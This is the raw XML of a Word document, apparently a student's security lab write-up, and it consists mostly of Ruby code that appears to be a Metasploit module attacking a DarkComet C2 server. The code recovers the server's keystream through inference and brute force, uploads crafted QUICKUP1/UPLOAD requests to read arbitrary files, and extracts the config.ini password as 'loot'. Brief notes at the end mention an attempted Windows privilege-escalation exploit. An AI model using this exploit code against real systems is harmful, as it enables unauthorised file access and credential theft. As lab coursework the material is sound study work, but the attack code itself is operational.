      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7D27B65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778AE97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else</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="272B6D8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msg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sock.get_once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(1024)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48165C5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1CE05BB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662ADEC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15B1890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disconnect</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="56E3B53A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78AC556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filedata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== ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06560AE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nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DECB40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else</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6CC268C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filedata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="793A48A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4C02D91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244FCCE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2475A46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5031948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# Fetch a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GetSIN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response from C2 server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191C025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def</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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fetch_getsin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6291C04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connect</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0C896DD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idtype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_msg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sock.get_once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(12)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F48482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6304884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idtype_msg.length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!= 12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEC3D7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disconnect</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="64FFEBB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nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4903406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1CCB40C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3C801DE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keystream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get_keystream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idtype_msg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, 'IDTYPE')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0909E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server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_msg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use_keystream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('SERVER',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67CEBA7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sock.put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server_msg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00D43A4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68CB8CFA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getsin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_msg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sock.get_once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(1024)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EC49F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disconnect</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7ADE19F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getsin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_msg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3596EA0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799CEB8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140483D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r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Carry out the crypto attack when we don't have a key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C42BB3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def</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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crypto_attack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exploit_string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77157E0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getsin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_msg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fetch_getsin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E90CA3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getsin_msg.nil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?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AA09E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nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D49C02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615E441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78679DC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getsin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_kp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'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GetSIN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'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+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['LHOST'] + '|'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1C5FD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keystream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get_keystream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getsin_msg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getsin_kp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6D967E4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417706D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keystream.length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&lt;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exploit_string.length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E4F386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missing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_bytecount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exploit_string.length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-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keystream.length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1033CBB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2E1C095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print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_status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("Missing #{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missing_bytecount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} bytes of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...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049E6BB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4C9694D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inferrence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_segment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''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D985C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brute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_max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4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEEE70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2E22FF4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missing_bytecount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&gt;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brute_max</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0FA7C53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print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_status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("Using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inferrence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attack ...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3245D64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3C3B237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# Offsets to monitor for changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CC376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target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_offset_range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[]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C75C2C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for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i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in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keystream.length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+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brute_max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)..(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keystream.length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+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missing_bytecount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- 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBE492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target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_offset_range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&lt;&lt;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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4B081BA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1118C283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7DEAD8F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# Store inference results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3591FFC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inference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_results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{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0E47F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67EAA97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# As long as we haven't fully recovered all offsets through inference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3073131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# We keep our observation window in a circular buffer with 4 slots with the buffer running between [head, tail]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AF43C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getsin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_observation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[''] * 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C8D40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buffer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_head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0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7B187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4F6653B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for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i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in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0..2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A7509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getsin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_observation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i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] = [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fetch_getsin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].pack('H*')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CB0C3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Rex.sleep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0.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA07AA3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138DA53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3C072AC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buffer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_tail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3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A02112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3C58E9B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# Actual inference attack happens here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0B2F0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while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!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target_offset_range.empty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?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A19058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getsin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_observation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buffer_tail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] = [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fetch_getsin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].pack('H*')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF6C76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Rex.sleep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0.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724D1B8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1324F03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# We check if we spot a change within a position between two consecutive items within our circular buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B204B6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# (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assuming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preceding entries are static in that position) we observed a 'carry',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ie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. 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our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observed position went from 9 to 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FA0EC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target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_offset_range.each</w:t>
      </w:r>
      <w:proofErr w:type="spell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do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|x|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4414D58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index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buffer_head</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E4FBC8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03FFB0B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while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index !=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buffer_tail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do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032B9FD3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next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_index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(index + 1) % 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9F035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5E51235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# The condition we impose is that observed character x has to differ between two observations and the character left of it has to differ in those same</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C48FB3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# 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observations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as well while being constant in at least one previous or subsequent observation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C9A57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getsin_observation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[index][x] !=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getsin_observation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next_index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][x]) &amp;&amp; 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getsin_observation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[index][x - 1] !=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getsin_observation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next_index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][x - 1]) &amp;&amp; ((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getsin_observation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[(index - 1) % 4][x - 1] ==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getsin_observation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[index][x - 1]) || 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getsin_observation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next_index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][x - 1] ==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getsin_observation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next_index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+ 1) % 4][x - 1]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DE6F9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target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_offset_range.delete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(x)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6CFDF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inference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_results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[x]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xor_strings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getsin_observation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[index][x], '9')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06584A2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break</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="04213D9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0A45978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index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next_index</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2AD25083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616775D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5920F1E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5FEC1BBA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# Update circular buffer head &amp; tail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF0AA5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buffer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_tail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buffer_tail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+ 1) % 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC41B3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# Move head to right once tail wraps around, discarding oldest item in circular buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54558CD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buffer_tail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buffer_head</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7109B95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buffer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_head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buffer_head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+ 1) % 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D196F7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73D60F1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760E67B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21AD6FF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#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Inferrence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attack done, reconstruct final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segment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15ADD95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inf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_seg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["\x00"] * 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keystream.length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+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missing_bytecount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49767F7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inferrence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_results.each</w:t>
      </w:r>
      <w:proofErr w:type="spell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do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|x,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val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|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6204FB4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inf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_seg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[x]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val</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7428C71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5B6A46D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172DB58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inferrence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_segment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inf_seg.slice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keystream.length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+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brute_max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inf_seg.length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).join</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9AA23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missing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_bytecount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brute_max</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7A4DD01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1635512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167751F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missing_bytecount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&gt;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brute_max</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7A90097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print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_status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("Improper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recovery ...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C7A51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nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4015709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118D602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77AD5B2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print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_status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("Initiating brute force ...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508DE0F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6DFC7E2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#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Bruteforce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first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missing_bytecount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bytes of timestamp (maximum of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brute_max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0A80AC3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charset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['1', '2', '3', '4', '5', '6', '7', '8', '9', '0']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055C3C43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char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_range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missing_bytecount.times.map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{ charset }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E808E3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char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_range.first.product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(*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char_range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[1..-1]) do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|x|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DD80F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p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x.join</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="20A9768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candidate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_plaintext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getsin_kp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+ p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2034B0A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candidate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get_keystream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getsin_msg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candidate_plaintext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) +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inferrence_segment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="20698C1A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filedata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try_exploit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exploit_string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candidate_keystream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, true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3072FA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39B796C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!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filedata.nil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?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531FD503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filedata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="073BBEF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1A18D7C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461AB7E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nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0EAF4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706708C3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3BC8161A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try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_exploit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exploit_string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keystream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, false)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0604C7A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006B195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27B8251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def</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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parse_password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filedata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5E74320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filedata.each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_line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{ |line|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAF5AB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elem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line.strip.split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('=')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24381AD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elem.length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&gt;= 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176B57D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elem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[0] == 'PASSWD'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C15BED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elem.length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== 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394792A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elem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[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D2DCC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else</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="796B8CC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''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E04EF7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0E633FD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1094B08A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33454FA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r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050DE2B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return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nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BF0B3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3C1D8E6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54EBD37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def</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761C525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r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Determine exploit string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378F08A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['NEWVERSION'] == true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054CBC7A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['TARGETFILE'] != '') &amp;&amp; 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['KEY'] != '')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE74FD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exploit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_string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'QUICKUP1|'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+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['TARGETFILE'] + '|'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EDC0F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else</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="730FCA6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exploit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_string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'QUICKUP1|config.ini|'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD5682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79096E9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elsif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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['TARGETFILE'] != '') &amp;&amp; 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['KEY'] != '')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E5840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exploit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_string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'UPLOAD'</w:t>
      </w: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 xml:space="preserve">+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['TARGETFILE'] + '|1|1|'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7507F33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else</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4D0A4EA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exploit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_string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= 'UPLOADconfig.ini|1|1|'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F778BF9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4841913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166DE3C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r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Run exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C8CEA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['KEY'] != ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AC590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filedata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try_exploit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exploit_string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, nil, false)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DF0C4C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else</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0FE79B6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filedata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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crypto_attack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exploit_string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4341761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415C289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078F348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r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Harvest interesting credentials, store loot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDFE86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!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filedata.nil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?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E48A5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# Automatically try to extract password from config.ini if we haven't set a key yet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159B34C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['KEY'] == ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E44406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password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 xml:space="preserve"> =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parse_password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filedata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1B67C3A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password.nil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?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C8B60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print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_status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("Could not find password in config.ini ...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFD044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elsif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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password == ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61995BC6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print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_status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("C2 server uses empty password!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5362A82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else</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0ADA99B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print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_status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("C2 server uses password [#{password}]")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F48EE3A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2BE82FF7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0584EB2E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> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573EEC0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r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Store to loot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F1716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['STORE_LOOT'] == true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00976FDB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print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_status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("Storing data to loot...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAAE153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if</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r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['KEY'] == '') &amp;&amp; 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['TARGETFILE'] != '')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529312E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store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_loot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("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darkcomet.file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", "text/plain",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['RHOST'],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filedata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, 'config.ini', "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DarkComet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C2 server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config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file")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4926D8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else</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="64642121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store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_loot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("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darkcomet.file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", "text/plain",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['RHOST'],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filedata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,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datastore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['TARGETFILE'], "File retrieved from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DarkComet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C2 server")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7057E82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7771C8A0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else</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="632AA59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print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_status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(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filedata.to_s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>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7620BC92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60EF17E3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else</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4F743A34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  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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print</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_status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("Attack failed or empty </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> file encountered ...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E9B575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78E317CD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r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>  </w:t>
      </w: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3B150C8F" w14:textId="77777777" w:rsidR="00BB6017" w:rsidRPr="00BB6017" w:rsidRDefault="00BB6017" w:rsidP="00BB6017">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:cs="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>end</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="36F4D842" w14:textId="3AF64302" w:rsidR="00297348" w:rsidRDefault="00BB6017" w:rsidP="00BB601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What I couldn’t get going was a </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB6017">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Microsoft Windows 7 &lt; 10 / 2008 &lt; 2012 (x86/x64) - Secondary Logon Handle Privilege Escalation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">, on the Windows 7 VM.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78370E2D" w14:textId="0BA9B7D9" w:rsidR="00BB6017" w:rsidRDefault="00BB6017" w:rsidP="00BB601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Could’ve been running it incorrectly?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617CCBF7" w14:textId="77777777" w:rsidR="00BB6017" w:rsidRDefault="00BB6017" w:rsidP="00BB601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8FEAFA4" w14:textId="3685A6F5" w:rsidR="00BB6017" w:rsidRDefault="00BB6017" w:rsidP="00BB601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2. The –R flag could be helpful as it restores previous sessions.  Also the –w flag could be smart if the timeout detects speed.  </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="035DA7AD" w14:textId="77777777" w:rsidR="00BB6017" w:rsidRDefault="00BB6017" w:rsidP="00BB601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4756F2F" w14:textId="77777777" w:rsidR="00BB6017" w:rsidRDefault="00BB6017" w:rsidP="00BB601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9963D14" w14:textId="07C1AD49" w:rsidR="00297348" w:rsidRPr="00297348" w:rsidRDefault="00297348" w:rsidP="002973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095BF3D" w14:textId="19EB3771" w:rsidR="00297348" w:rsidRDefault="00297348"/>
    <w:sectPr w:rsidR="00297348" w:rsidSect="00D71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760E8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8052446A"/>
    <w:lvl w:ilvl="0" w:tplc="8FD67978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8DE"/>
    <w:rsid w:val="00297348"/>
    <w:rsid w:val="004732A4"/>
    <w:rsid w:val="004908DE"/>
    <w:rsid w:val="00B942AE"/>
    <w:rsid w:val="00BB6017"/>
    <w:rsid w:val="00D7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1247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34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34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2053</Words>
  <Characters>11708</Characters>
  <Application>Microsoft Macintosh Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>97</Lines>
  <Paragraphs>27</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>USC</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>13734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Nandapurkar</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Zachary Nandapurkar</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-12-02T10:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-02T10:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>